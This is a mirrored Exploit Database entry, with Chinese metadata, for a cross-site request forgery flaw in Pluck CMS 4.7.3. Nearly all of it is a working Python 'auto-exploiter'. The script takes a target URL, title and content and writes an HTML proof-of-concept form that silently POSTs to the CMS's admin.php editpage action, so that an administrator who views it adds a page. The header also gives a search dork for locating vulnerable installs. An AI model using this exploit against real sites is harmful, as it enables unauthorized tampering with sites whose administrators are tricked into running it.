Pluck CMS 4.7.3 – Cross-Site Request Forgery (Add Page)

• Exploit Database
• 113 阅读

• 作者： Ahsan Tahir
  日期： 2016-10-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40566/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75

  # Exploit Title: Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery # Exploit Author: Ahsan Tahir # Date: 18-10-2016 # Software Link: http://www.pluck-cms.org/?file=download # Vendor: http://www.pluck-cms.org/ # Google Dork: "2005-2016. pluck is available" # Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial # Website: www.ahsan-tahir.com # Category: webapps # Version: 4.7.3 # Tested on: [Kali Linux 2.0 | Windows 8.1] # Email: mrahsan1337@gmail.com   import os import urllib   if os.name == &apos;nt&apos;: os.system(&apos;cls&apos;) else: os.system(&apos;clear&apos;)   def csrfexploit():   banner = &apos;&apos;&apos; +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==+ |______ ____ ____ ____ | | |_ \| |_ ____| | __/ ___|\// ___|| | | |_) | | | | |/ __| |/ / | | | |\/| \___ \| | |__/| | |_| | (__| <| |___| || |___) | | | |_| |_|\__,_|\___|_|\_\\____|_||_|____/| |//PluckCMS 4.7.3 Add-Post CSRF Auto-Exploiter | |> Exploit Author & Script Coder: Ahsan Tahir| +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ &apos;&apos;&apos; print banner   url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): ")) title = str(raw_input(" [+] Enter the Title of the Post which you want to add by exploiting CSRF: ")) content = raw_input(" [+] Enter the Content, which you want to add in the post by exploiting CSRF: ")   csrfhtmlcode = &apos;&apos;&apos; <html> <!-- CSRF PoC --> <body> <form action="%s/admin.php?action=editpage" method="POST"> <input type="hidden" name="title" value="%s" /> <input type="hidden" name="seo&#95;name" value="" /> <input type="hidden" name="content" value="%s" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="keywords" value="" /> <input type="hidden" name="hidden" value="no" /> <input type="hidden" name="sub&#95;page" value="" /> <input type="hidden" name="theme" value="default" /> <input type="hidden" name="save" value="Save" /> <input type="submit" value="Submit request" /> </form> </body> </html> &apos;&apos;&apos; %(url, title, content)   print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."   print(" [!] Enter your Filename below\n Note: The exploit will be saved as &apos;filename&apos;.html \n") extension = ".html" name = raw_input(" Filename: ") filename = name+extension file = open(filename, "w")   file.write(csrfhtmlcode) file.close() print(" [+] Your exploit is saved as %s")%filename print("")   csrfexploit()